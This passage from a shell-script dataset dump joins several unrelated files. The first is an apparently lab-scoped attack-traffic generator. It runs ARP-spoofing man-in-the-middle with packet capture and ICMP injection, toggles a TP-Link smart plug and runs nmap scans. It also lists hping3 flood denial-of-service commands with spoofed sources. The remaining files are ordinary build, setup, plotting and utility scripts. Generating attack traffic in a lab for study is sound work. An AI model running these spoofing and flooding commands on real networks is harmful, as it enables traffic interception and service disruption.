printf "\nExecuting : $Arpspoof$router$sep$Random_IP$noout\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Arpspoof$router$sep$Random_IP$noout)
#perform the steps from each depending on probability chosen (if else)
if [ "$rand_probability" = "1" ]; then #passive monitoring
#steps from passive monitoring
MITM_type="passive monitoring"
printf "\nExecuting : TCPDUMP $i - $Random_IP\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
Tcpdump="tcpdump -i wlan0 -s 65535 -w ./scenarios_output/arpspoof_tcpdump/tcpdump-passive$i-$Random_IP.pcap"
printf $(eval $Tcpdump) & scriptTCPDUMP=$!
Random_Num_Packets="not applicable"
#add random exexution time
else
#steps from packet injection
MITM_type="packet injection"
printf "\nExecuting : TCPDUMP $i - $Random_IP\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
Tcpdump="tcpdump -i wlan0 -s 65535 -w ./scenarios_output/arpspoof_tcpdump/tcpdump-injection$i-$Random_IP.pcap"
printf $(eval $Tcpdump) & scriptTCPDUMP=$!
Random_Time_BeforeInj=$(shuf -i10-120 -n1) #from 10 sec to 30 sec
printf "\nAttack duration before injection: $Random_Time_BeforeInj\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $Random_Time_BeforeInj #change to Random_Time
#injection - random number of ICMP packets with random breaks in between each of them
Random_Num_Packets=$(shuf -i1-50 -n1) #1 to 50
for (( c=1; c<=$Random_Num_Packets; c++ ))
do
injection_time=$(date "+%Y.%m.%d-%H.%M.%S")
#if more packets to be injected - could add an if-else with random choice of the packet to be injected
printf "\n *$injection_time Injecting ICMP packet $c out of $Random_Num_Packets ..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Inject_packet$Random_IP) & scriptInject=$!
sleep 1
kill $scriptInject
Random_InBetween_Sleep=$(shuf -i1-60 -n1) #from 1 sec to 60 sec
printf "\n Sleeping for $Random_InBetween_Sleep ..."
sleep $Random_InBetween_Sleep
done
Random_Time_AfterInj=$(shuf -i10-120 -n1) #from 10 sec to 5 min
printf "\n Attack duration after injection: $Random_Time_AfterInj\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $Random_Time_AfterInj
fi
# Teardown: stop the spoofers and capture processes, restore forwarding.
printf "\nFinishing the attack...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf "\nKilling all arpspoof...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
killall arpspoof 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf "\nKilling $scriptTCPDUMP...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
kill $scriptTCPDUMP 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf "\nKilling all tcpdump - to reassure...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
killall tcpdump 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#disable IP forwarding
printf "\nDisabling IP forwarding..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
#logging
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf "\n\n$1) Scenario 3 Network Scanning + MITM\n *start: $start_current_time \n *stop: $stop_current_time \n *A)Nmap scanning: \n **$Random_QUICK \n ***start: $start_quick\n ***stop: $stop_quick\n *B)MITM: \n **type: $MITM_type \n **number of packets injected: $Random_Num_Packets" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
: 'Scenario 4 : Attack on the TP-Link plug with iot-toolkit
This scenario represents the IoT-specific attack which uses the iot-toolkit framework by Fernando Gont. It targets the TP-Link devices for reconnaissance and performs toggle/get_info on the TP-Link smart plug.
'
function scenario4 {
# Scenario 4: IoT-specific attack against a TP-Link smart plug using the
# iot-toolkit framework (iot-scan for discovery, iot-tl-plug for
# get_info/toggle). One of four variants is chosen uniformly at random.
# Arguments:
#   $1 - iteration number, used only for logging
# Side effects: runs the iot-toolkit binaries from the current directory
# and appends a summary to the scenario log files.
i=$1
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:4 = iot-toolkit\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#three types of attacks in the framework
iot_scanning="./iot-scan -i wlan0 -L 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt"
iot_get_info="./iot-tl-plug -L -i wlan0 -c get_info 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt"
iot_toggle="./iot-tl-plug --toggle 192.168.200.146" #type in the ip of the plug manually
#parameters for toggle attack
rand_intensity=$(shuf -i50-500 -n1)
rand_time=$(shuf -i30-360 -n1)
hash_sign="#"
# FIX: the toggle command was built from the undefined variable $x3, which
# yielded just "#<intensity>#<time>" with no executable; base it on
# $iot_toggle (the only toggle command defined here).
toggle_command=$iot_toggle$hash_sign$rand_intensity$hash_sign$rand_time
#choose random variant
rand_variant=$(shuf -i1-4 -n1)
# FIX: current_time used to be assigned only inside variant 1 but is
# interpolated into the log message of every variant; set it once up front.
current_time=$(date "+%Y.%m.%d-%H.%M.%S")
if [ "$rand_variant" = "1" ]; then #scanning only
printf "$current_time Performing scanning with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
x_current="Scanning only"
elif [ "$rand_variant" = "2" ]; then #scanning + get_info
printf "$current_time Performing scanning and get_info with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
printf $(eval $iot_get_info)
x_current="Scanning + get_info"
elif [ "$rand_variant" = "3" ]; then #scanning + toggle
printf "$current_time Performing scanning and toggle(intensity:$rand_intensity, time:$rand_time) with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
printf $(eval $toggle_command)
x_current="Scanning + toggle"
elif [ "$rand_variant" = "4" ]; then #scanning + get_info + toggle
# FIX: log message now mentions get_info, which this variant also runs.
printf "$current_time Performing scanning, get_info and toggle(intensity:$rand_intensity, time:$rand_time) with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
printf $(eval $iot_get_info)
printf $(eval $toggle_command)
x_current="Scanning + get_info + toggle"
else
printf "error in variants choice - do nothing"
fi
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
#logs
printf "\n\n$1) Scenario 4 \n *start: $start_current_time \n *stop: $stop_current_time \n *type: $x_current" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
#get the IPs on the network
# Ping-sweep the lab /24 and collect the addresses of hosts reported "Up".
IPS=$(nmap -n -sn 192.168.200.0/24 -oG - | awk '/Up$/{print $2}')
init_arrIPS=($IPS)
#hardcode router's IP
router="192.168.200.1"
#initial mapping of IP to MAC addresses for debugging
printf "Initial verification of IPs and MACs: \n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
sudo arp-scan 192.168.200.0/24 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf "\n\n"
#verify IPs for the attack
printf "\nInitial IPs scan:\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf ' *%s\n' "${init_arrIPS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf "\n\n"
#delete restricted IP addresses from the list (devices that should not be targeted in the attacks)
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.1$") #router
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.2$") #firewall/syslog
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.3$") #firewall/syslog
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.134$") #attacker's computer in the lab
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.133$") #Kali virtual machine on Gosia's laptop
#https://stackoverflow.com/questions/16860877/remove-element-from-array-shell
#the below doesnt work - deletes the whole 192.168.200.1 sequence pattern from every element
#declare -a new_arrIPS=( ${arrIPS[@]/192.168.200.134/} )
#new_arrIPS1=( ${new_arrIPS[@]/^192.168.200.1$/} )
#echo ${new_arrIPS1[@]}
#the loop below works to restrict the array elements!! finally...
# Filter out protected devices: exact-match each discovered IP against the
# space-padded, joined restricted list.
arrIPS=()
arr_restricted=("192.168.200.1" "192.168.200.2" "192.168.200.3" "192.168.200.134")
for i in "${init_arrIPS[@]}"
do
if [[ " ${arr_restricted[*]} " == *" $i "* ]]; then
echo "$i discarded"
else
arrIPS+=("$i")
fi
done
printf "\nIPs for attacks:\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf ' *%s\n' "${arrIPS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
i=0
#main loop
# Runs forever: each iteration rebuilds the per-iteration attack command
# lists (the nmap xml file names embed $i) and launches one scenario.
while true
do
i=$((i+1))
#list of quick scanning attacks
arrQUICK=("sudo nmap -T4 -F -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-quick.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sn -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-ping.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sn --traceroute -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-quick_traceroute.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sV -T4 -O -F --version-light -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-quickscan_plus.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt")
#list of long scanning attacks
arrLONG=("sudo nmap -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-regular.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -T4 -A -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sS -sU -T4 -A -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense_plus_udp.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -T4 -A -v -Pn -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense_noping.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -p 1-65535 -T4 -A -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense_allTCPports.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt")
#list of denial of service attacks
arrDOS=("sudo hping3 -1 --flood --rand-source " "sudo hping3 -1 -C 3 -K 3 --flood --rand-source " "sudo hping3 -d 3000 --flood --frag -p 80 -S " "sudo hping3 --flood -d 3000 --frag --rand-source -p 80 -A " "sudo hping3 --flood -d 3000 --frag --rand-source -p 80 -R " "sudo hping3 --flood -d 3000 --rand-source -p 80 -F -S -R -P -A -U -X -Y " "sudo hping3 --flood --rand-source --udp --sign 'GGFlood' -p 80 ")
#pick random attack number
printf "\n Executing Main Loop\n"
# FIX: this call used to read `scenario3 $i $arrIPS#how to call an attack`.
# Bare $arrIPS expands to only the first array element, and the glued
# "#how..." text was NOT a comment — it became part of the arguments.
# "${arrIPS[*]}" passes all target IPs as one string, which scenario3
# re-splits via arrIPS=($2).
scenario3 "$i" "${arrIPS[*]}" #how to call an attack
#if else
sleep 5s
done
| true
|
4a4c356b358e44bb13a97b01089620af11c0910b
|
Shell
|
sibuserv/lxe
|
/pkg/minizip.sh
|
UTF-8
| 1,335
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This file is part of LXE project. See LICENSE file for licensing information.
# Build recipe for minizip. The minizip sources ship inside the zlib tarball
# (contrib/minizip), so the zlib archive is downloaded and the minizip
# subtree is carved out before building.
# NOTE(review): helper functions (CheckPkgVersion, BuildPkg, ...) and the
# *_VER / SYSROOT / JOBS variables are presumably provided by the LXE
# framework that runs this recipe — confirm against the framework sources.
# The surrounding ( ... ) subshell keeps variable/cwd changes isolated.
(
PKG=minizip
PKG_VERSION=${MINIZIP_VER}
PKG_SUBDIR=${PKG}-${PKG_VERSION}
# The downloaded archive is actually the zlib source tree.
PKG_SUBDIR_ORIG=zlib-${ZLIB_VER}
PKG_FILE=${PKG_SUBDIR_ORIG}.tar.gz
# https://www.zlib.net/
# http://www.winimage.com/zLibDll/minizip.html
PKG_URL="https://sourceforge.net/projects/libpng/files/${PKG}/${PKG_VERSION}/${PKG_FILE}"
PKG_DEPS="gcc zlib"
CheckPkgVersion
CheckSourcesAndDependencies
if IsBuildRequired
then
PrintSystemInfo
BeginOfPkgBuild
UnpackSources
PrepareBuild
SetBuildFlags
SetCrossToolchainPath
SetCrossToolchainVariables
# Replace the unpacked zlib tree with just its contrib/minizip subtree.
cd "${PKG_SRC_DIR}"
cp -aT "${PKG_SUBDIR_ORIG}/contrib/minizip" "${PKG_SUBDIR}"
rm -rf "${PKG_SUBDIR_ORIG}"
unset PKG_SUBDIR_ORIG
export LIBTOOL="/usr/bin/libtool"
GenerateConfigureScript
ConfigureAutotoolsProject
BuildPkg -j ${JOBS} minizip miniunzip LIBTOOL="${LIBTOOL}"
InstallPkg install LIBTOOL="${LIBTOOL}"
CleanPkgBuildDir
CleanPkgSrcDir
# Keep only the library flavour matching the configured build type.
if IsStaticPackage
then
rm -f "${SYSROOT}/usr/lib/libminizip.so"*
else
rm -f "${SYSROOT}/usr/lib/libminizip.a"
fi
fi
)
| true
|
e99b3f93b30209ea623ff511245548ddd1618897
|
Shell
|
codepulseme/week-planner
|
/cp-todo-backend/node-ts-api-starter.sh
|
UTF-8
| 1,869
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# Scaffold a Node.js + TypeScript API project in the directory given with
# the -d option: npm init plus core/dev dependency installation.
# Runtime dependencies, installed with --save.
declare -a coreDeps=(body-parser debug express morgan firebase firebase-admin)
# Tooling and @types packages, installed with --save-dev.
declare -a devDeps=(typescript gulp gulp-typescript chai chai-http mocha ts-node @types/body-parser @types/chai @types/chai-http @types/debug @types/express @types/mocha @types/morgan @types/node @types/firebase)
proj_dir=''
function installDeps() {
# Install each dependency at its latest published version.
#   $1     - category: "dev" installs with --save-dev, anything else --save
#   $2..$n - package names to install
# FIX: the original sliced ${args[@]:1:$nArgs} (one element too many, which
# happened to work) and left every expansion unquoted; use shift plus a
# properly quoted array instead.
local category=$1
shift
local deps=("$@")
# TODO: concatenate dependencies and install everything at once
local pkg version
for pkg in "${deps[@]}"; do
version=$(npm show "$pkg" version)
if [[ $category == 'dev' ]]; then
npm install "$pkg@$version" --save-dev
else
npm install "$pkg@$version" --save
fi
done
}
function error() {
# Print the usage hint for the mandatory -d option and abort.
# FIX: corrected the typo "sepcify" -> "specify" in the user-facing message.
echo "Please specify the project location with the -d option."
exit
}
function init() {
# Scaffold the project in $proj_dir: create the directory, run npm init,
# install the core and dev dependency sets, then exit the script.
echo "Initializing project. . ."
# FIX: mkdir was wrapped in a useless command substitution $(mkdir ...) and
# both mkdir and cd used the path unquoted and unchecked; quote it and bail
# out on failure instead of installing into the wrong directory.
mkdir "${proj_dir}" || exit 1
cd "${proj_dir}" || exit 1
# initialize node.js
npm init -y
installDeps "core" "${coreDeps[@]}"
installDeps "dev" "${devDeps[@]}"
# TODO:
# 1. create tsconfig.json
# 1.1 configure the file with
# 2. mkdir src
# 3. create gulpfile.js
# 3.1 create gulpfile with tasks
# TODO: add option for installing database(s)
exit
}
function invalidFlag() {
# Report an unrecognized command-line flag and stop the script.
local bad_flag="$1"
echo "Invalid flag: ${bad_flag}"
exit
}
# Parse flags: -d <dir> selects the project location. Validation happens
# inside the loop so -d's argument is checked as soon as it is seen.
while getopts 'd:' flag; do
case "${flag}" in
d) proj_dir="${OPTARG}" ;;
*) invalidFlag ${flag} ;;
esac
if [[ -z $proj_dir ]]; then
error
elif [[ -d $proj_dir ]]; then
# Existing directory: offer to wipe it and start over.
read -p "Directory ${proj_dir} already exists. Would you like to remove its contents and reinitialize (y/n)?" opt
if [[ $opt == 'y' || $opt == 'Y' ]]; then
echo "Force removing directory ${proj_dir}. . ."
# NOTE(review): the $( ) here is a useless command substitution — it runs
# rm but then tries to execute rm's (empty) output; a bare rm would do.
$(rm -fr $proj_dir)
else
echo "Directory already exists. Please choose a different location or delete the directory."
exit
fi
fi
# init exits the script, so the loop body completes at most once.
init
done
# Reaching here means no flags were supplied at all.
error
| true
|
b0497564e5f7535c6e38cd31607f2c9d9d74868f
|
Shell
|
t3ll0n/4103-101-OpSys-Smith
|
/assignments/homework-01/myrandom.sh
|
UTF-8
| 267
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# Print a single word picked at random from the system dictionary file
# located at /usr/share/dict/words.

# shuf -n1 emits exactly one random line from the dictionary.
random_word=$(shuf -n1 /usr/share/dict/words)

# Show the result to the user.
echo "Random Word: "$random_word
| true
|
c8ebad1768b5e181226c0742ed45c18ccd4344f9
|
Shell
|
DJKessler/dot-files
|
/shell-configs/zsh-custom/macOs.zsh
|
UTF-8
| 268
| 2.859375
| 3
|
[] |
no_license
|
# macOS-only environment tweaks (skipped on every other platform).
if [[ "$OSTYPE" == "darwin"* ]]; then
# Prefer /usr/local binaries and the GNU coreutils gnubin/gnuman trees
# (Homebrew layout) over the BSD userland shipped with macOS.
export PATH="/usr/local/bin:$PATH"
export PATH="/usr/local/opt/coreutils/libexec/gnubin:$PATH"
export MANPATH="/usr/local/opt/coreutils/libexec/gnuman:$MANPATH"
# remove duplicate entries from $PATH
typeset -aU path
fi
| true
|
bdf5f0cf104b9a4fe1f5e4eedc6541204897d628
|
Shell
|
nikhildhruwe/day8-assignment
|
/DiceCount.sh
|
UTF-8
| 865
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash -x
# Roll a six-sided die repeatedly until one face has come up 10 times,
# tallying per-face counts in the associative array Dice, then print each
# face's count and report the most- and least-rolled faces.
# FIX: replaced the six duplicated count1..count6 variables and the case
# statement with a direct tally into Dice; fixed the "Maximim" output typo.
declare -A Dice
# Map a die roll (1-6) to the word used as the tally key; index 0 unused.
faces=("" one two three four five six)
flag=0
while (( flag != 1 ))
do
  # RANDOM%6+1 yields a roll in 1..6
  check=$((RANDOM%6+1))
  key=${faces[$check]}
  Dice[$key]=$(( ${Dice[$key]:-0} + 1 ))
  # Stop as soon as any face reaches 10 occurrences.
  if (( Dice[$key] == 10 ))
  then
    flag=1
  fi
done
Max=0
Min=10
for key in ${!Dice[@]}
do
  echo $key : ${Dice[$key]}
  if ((${Dice[$key]}>$Max))
  then
    Max=${Dice[$key]}
    MaxDice=$key
  fi
  if ((${Dice[$key]}<$Min))
  then
    Min=${Dice[$key]}
    MinDice=$key
  fi
done
echo " "
echo "Maximum times : $MaxDice"
echo "Minimum times : $MinDice"
|
2bab6e14d7002fb3db0a73802449de6e62f994b3
|
Shell
|
AlexandreCo/Raspy-doc
|
/scripts/rf2txt/display.sh
|
UTF-8
| 3,758
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Render gnuplot PNG graphs from daily sensor logs.
# Usage: display.sh <nb_days> <address> <counter_field> <color>
NB_DAY=$1    # number of days of history to plot (1, 7, or more)
ADDRESS=$2   # sensor address used to filter log lines
NUM_CPT=$3   # semicolon-separated field number of the counter
COLOR=$4     # gnuplot line colour

LOG_PATH=/var/www/GnOmeDataCenter/log_brut
LOG_OUT=/var/www/GnOmeDataCenter/out
DATE=$(date "+%s")
FILEOUT="${ADDRESS}_${NB_DAY}_${NUM_CPT}_data.txt.png"

export GDFONTPATH=/usr/share/font/

# Pick the x-axis tick label format according to the period plotted.
if [[ $NB_DAY == 1 ]]; then
  XFORMAT="%H:%M "
elif [[ $NB_DAY == 7 ]]; then
  XFORMAT="%H:%M-%d/%m "
else
  XFORMAT="%d/%m "
fi
function genere_single_cmd()
{
# Emit a gnuplot script that plots raw timestamped samples from
# single.dat$DATE ("Y-m-d:H:M:S value") as a filled curve into
# $LOG_OUT/$FILEOUT. Comments must stay outside the here-doc so they do
# not leak into the generated gnuplot commands.
cat <<EOF
set terminal pngcairo enhanced font "arial,10" fontscale 1.0 size 500, 350
set output "$LOG_OUT/$FILEOUT"
set format x "$XFORMAT"
set key off
set style fill solid 1.00 border lt -1
set xdata time
set xtics border in scale 0,0 nomirror rotate by -45 offset character 0, 0, 0 autojustify
set xtics norangelimit font ",8"
set xtics ()
set timefmt "%Y-%m-%d:%H:%M:%S"
plot "single.dat$DATE" using 1:2 with filledcurves below x1 lt rgb '$COLOR' lw 2
EOF
}
function genere_rain_cmd()
{
# Emit a gnuplot script that plots per-day totals from rain.dat$DATE
# ("Y-m-d total") as a filled curve into $LOG_OUT/$FILEOUT. Note the
# date-only timefmt, unlike the per-sample variant above.
cat <<EOF
set terminal pngcairo enhanced font "arial,10" fontscale 1.0 size 500, 350
set output "$LOG_OUT/$FILEOUT"
set format x "$XFORMAT"
set key off
set style fill solid 1.00 border lt -1
set xdata time
set xtics border in scale 0,0 nomirror rotate by -45 offset character 0, 0, 0 autojustify
set xtics norangelimit font ",8"
set xtics ()
set timefmt "%Y-%m-%d"
plot "rain.dat$DATE" using 1:2 with filledcurves below x1 lt rgb '$COLOR' lw 2
EOF
}
function genere_minmax_cmd()
{
# Emit a gnuplot script that draws a daily min/max band from
# minmax.dat$DATE ("Y-m-d min max"): the max curve is filled in $COLOR,
# then the min curve is filled in white to hollow out the band. The
# terminal/output are set just before the final replot, which writes
# $LOG_OUT/minmax_$FILEOUT.
cat <<EOF
set format x "$XFORMAT"
set key off
set style fill solid 1.00 border lt -1
set xdata time
set xtics border in scale 0,0 nomirror rotate by -45 offset character 0, 0, 0 autojustify
set xtics norangelimit font ",8"
set xtics ()
set timefmt "%Y-%m-%d"
plot "minmax.dat$DATE" using 1:3 with filledcurves above x1 lt rgb '$COLOR' lw 2
replot "minmax.dat$DATE" using 1:2 with filledcurves below x1 lt rgb 'white' lw 2
set terminal pngcairo enhanced font "arial,10" fontscale 1.0 size 500, 350
set output "$LOG_OUT/minmax_$FILEOUT"
replot
EOF
}
function split_file()
{
# Build the data file for the upcoming plot from the newest $NB_DAY log
# files (names starting with "201", i.e. date-prefixed).
for i in `ls $LOG_PATH | grep "^201" | tail -n $NB_DAY`
do
FILENAME=$i
if [[ $NB_DAY == 1 || $NB_DAY == 7 ]]
then
# Short periods: keep every sample as "date:time value" rows.
# NUM_CPT is passed into awk as an awk variable, then used as $NUM_CPT.
cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;"| awk -F";" '{print $2":"$3" "$NUM_CPT}' NUM_CPT=$NUM_CPT>> single.dat$DATE
else
# Long periods: reduce each day to its min and max counter value.
min=$(cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;" |cut -d';' -f$NUM_CPT| sort -n | head -1)
max=$(cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;" |cut -d';' -f$NUM_CPT| sort -n -r | head -1)
# The log file name starts with the date, up to the first '_'.
INDEX_DATE=`echo $FILENAME | cut -f1 -d '_'`
echo $INDEX_DATE $min $max >> minmax.dat$DATE
fi
done
}
function rain_file()
{
# Build rain.dat$DATE: one "<date> <total>" line per daily log file.
# The counter field is cumulative, so the day's total is max - min.
# FIX: replaced the external 'expr' call with $(( )) arithmetic and the
# useless 'cat | grep' pipelines with direct grep on the file; quoted the
# field number and file paths.
for i in `ls $LOG_PATH | grep "^201" | tail -n $NB_DAY`
do
FILENAME=$i
min=$(grep "^$ADDRESS;" "$LOG_PATH/$FILENAME" | cut -d';' -f"$NUM_CPT" | sort -n | head -1)
max=$(grep "^$ADDRESS;" "$LOG_PATH/$FILENAME" | cut -d';' -f"$NUM_CPT" | sort -n -r | head -1)
if [ -n "$min" ]
then
total_rain=$(( max - min ))
else
# No samples for this sensor that day.
total_rain=0
fi
# The log file name starts with the date, up to the first '_'.
INDEX_DATE=${FILENAME%%_*}
echo "$INDEX_DATE $total_rain" >> "rain.dat$DATE"
done
}
# Counter 9 is the rain gauge: plot daily totals. Otherwise plot raw
# samples for short periods (1/7 days) or a min/max band for longer ones.
# Each branch generates the gnuplot command file, builds the data file,
# renders, archives the data next to the logs, and cleans up.
if [[ $NUM_CPT == 9 ]]
then
# NOTE(review): '>>' (append) here vs '>' in the other branches — confirm
# this is intentional; a leftover rain.cmd$DATE would accumulate commands.
genere_rain_cmd >> rain.cmd$DATE
rain_file
gnuplot < rain.cmd$DATE
cp rain.dat$DATE /var/www/GnOmeDataCenter/log_brut/$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_rain.dat"
rm rain.cmd$DATE
rm rain.dat$DATE
else
if [[ $NB_DAY == 1 || $NB_DAY == 7 ]]
then
genere_single_cmd > single.cmd$DATE
split_file
gnuplot < single.cmd$DATE
cp single.dat$DATE /var/www/GnOmeDataCenter/log_brut/$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_single.dat"
rm single.dat$DATE
rm single.cmd$DATE
else
genere_minmax_cmd > minmax.cmd$DATE
split_file
gnuplot < minmax.cmd$DATE
cp minmax.dat$DATE /var/www/GnOmeDataCenter/log_brut/$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_minmax.dat"
rm minmax.cmd$DATE
rm minmax.dat$DATE
fi
fi
| true
|
068eaf6ef353948588addf8462283e7fef966d1a
|
Shell
|
DavidBuchanan314/webos-homebrew-channel-1
|
/services/elevate-service
|
UTF-8
| 562
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh
# Point a webOS service's luna-service2 dev registration at the homebrew
# install location so it runs from /media/developer instead of /usr/bin.
set -e
# Target service; defaults to the Homebrew Channel service.
SERVICE_NAME="${1:-org.webosbrew.hbchannel.service}"
echo "[ ] Elevating '$SERVICE_NAME'..."
# Rewrite the executable path inside the service registration file
# (';' is used as the sed delimiter because the replacement contains '/').
sed -i 's;/usr/bin;/media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service;' /var/luna-service2-dev/services.d/$SERVICE_NAME.service
echo "[ ] Refreshing services..."
ls-control scan-services
# NOTE(review): the optional restart step below is disabled; it also uses
# bash-only [[ ]] under a /bin/sh shebang and would need fixing if revived.
#if [[ "$2" != "--no-restart" ]]; then
# echo "[ ] Restarting service..."
# pkill -x -f $SERVICE_NAME || echo " Not running."
#
# echo "[ ] Checking..."
# ls-monitor -i $SERVICE_NAME
# echo
# ps u -C $SERVICE_NAME
#fi
|
85e83f96c8a245fdad38cdbfde449a5bec335208
|
Shell
|
frtrotta/script_correzione
|
/pull_repos.sh
|
UTF-8
| 973
| 3.828125
| 4
|
[] |
no_license
|
#!/bin/bash
# Batch-update checked-out repositories: for every GitHub user listed in a
# file, run 'git pull' inside ./<user>/<repository> and record failures in
# an error report file.
echo "v0.3 - 16-feb-2015"
repository=$1
branch=$2
githubusers=$3
tokenfile=$4
# All four arguments are mandatory.
if [ -z $repository ] || [ -z $branch ] || [ -z $githubusers ] || [ -z $tokenfile ]
then
echo "ERROR: missing parameter"
echo "$0 <repository> <branch> <githubusers_filename> <token_filename>"
exit 1
fi
# Access token read from file (echoed here for debugging only).
token=`cat $tokenfile`
echo $token
temp=output.txt
curdir=`pwd`
# Error report: "<users-file minus its last 4 chars (.txt)>_pulled.err".
errorreport="$curdir/${githubusers:0:${#githubusers}-4}_pulled.err"
rm $errorreport &> /dev/null
n=0
s=0
while read u;
do
n=$((n+1))
cd $u/$repository/
if [ $? -eq 0 ]
then
# NOTE(review): $branch is passed where 'git pull' expects a
# repository/remote argument — confirm the intended invocation.
git pull $branch > "$temp"
if [ $? -eq 0 ]
then
s=$((s+1))
echo "==> $n: $u/$repository fetched"
else
echo "==> $n: ERROR: $u/$repository failed fetching"
# NOTE(review): plain echo does not expand '\n'; the two literal
# characters end up in the report file.
echo "$u/$repository failed fetching\n" >> "$errorreport"
fi
cd ../..
else
echo "==> $n: ERROR: unable to find dir $u"
echo "$u unable to find dir" >> "$errorreport"
fi
done < $githubusers
echo "$n users read - $s repositories successfully pulled"
|
8e0ca1db7ab89b63ce64a9108d39d6729086b7b6
|
Shell
|
zchee/zsh-default-completions
|
/src/Solaris/Command/_pkg5
|
UTF-8
| 12,455
| 2.984375
| 3
|
[] |
no_license
|
#compdef pkg
_pkg5_pkgs() {
local cache_policy cache_id=pkg5_installed_pkgs:$HOST:${pkg5_root//\//+}
typeset -a -g _pkg5_installed_pkgs
zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
if [[ -z "$cache_policy" ]]; then
zstyle ":completion:${curcontext}:" cache-policy _pkg5_installed_caching_policy
fi
if ( [[ $#_pkg5_installed_pkgs -eq 0 ]] || _cache_invalid $cache_id ) && ! _retrieve_cache $cache_id; then
_pkg5_installed_pkgs=( $(
pkg -R $pkg5_root list -H | while read pkg junk; do
